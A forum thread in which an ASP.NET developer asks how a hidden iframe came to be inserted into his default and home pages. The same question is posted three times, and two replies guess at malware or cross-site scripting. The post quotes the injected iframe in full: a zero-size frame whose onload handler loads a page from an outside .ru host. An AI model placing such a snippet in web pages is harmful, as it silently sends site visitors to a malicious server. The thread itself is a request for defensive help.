Wrote Un Wanted Code
-
Hi All, I have developed a website using asp.net. The problem is someone was write for unwanted content in my two pages like default & home pages. When go to my url it open a login page. Once the user will give valid input then i will redirect the default page. And next to go to Home page. The following text was write in my site. <iframe frameborder="0" onload="if (!this.src){ this.src='http://testossteron.ru:8080/index.php'; this.height='0'; this.width='0';}" >wnwoccykiicptwlnvyhdhlbctpxyvqw</iframe> This text was write on after body tag. How this text was write in my default page and how to avoid this type of issues? Please Help Me
-
Hi All, I have developed a website using asp.net. The problem is someone was write for unwanted content in my two pages like default & home pages. When go to my url it open a login page. Once the user will give valid input then i will redirect the default page. And next to go to Home page. The following text was write in my site. <iframe frameborder="0" onload="if (!this.src){ this.src='http://testossteron.ru:8080/index.php'; this.height='0'; this.width='0';}" >wnwoccykiicptwlnvyhdhlbctpxyvqw</iframe> This text was write on after body tag. How this text was write in my default page and how to avoid this type of issues? Please Help Me
-
Hi All, I have developed a website using asp.net. The problem is someone was write for unwanted content in my two pages like default & home pages. When go to my url it open a login page. Once the user will give valid input then i will redirect the default page. And next to go to Home page. The following text was write in my site. <iframe frameborder="0" onload="if (!this.src){ this.src='http://testossteron.ru:8080/index.php'; this.height='0'; this.width='0';}" >wnwoccykiicptwlnvyhdhlbctpxyvqw</iframe> This text was write on after body tag. How this text was write in my default page and how to avoid this type of issues? Please Help Me
I think its a Trojan Attack in the server. Are your server is not protected from Antivirus or Security softwares ? If not, buy one and install it immediately. These are to steal important data from your server. Check this Malicious Script[^]
Abhishek Sur **Don't forget to click "Good Answer" if you like this Solution.
My Latest Articles-->** Microsoft Bing MAP using Javascript
CLR objects in SQL Server 2005
Uncommon C# Keywords/xml> -
Seems like your web pages infected by a malware. You contact your host providers for further assistance. Another possibility is that the cross site scripting. Do you validate the user inputs?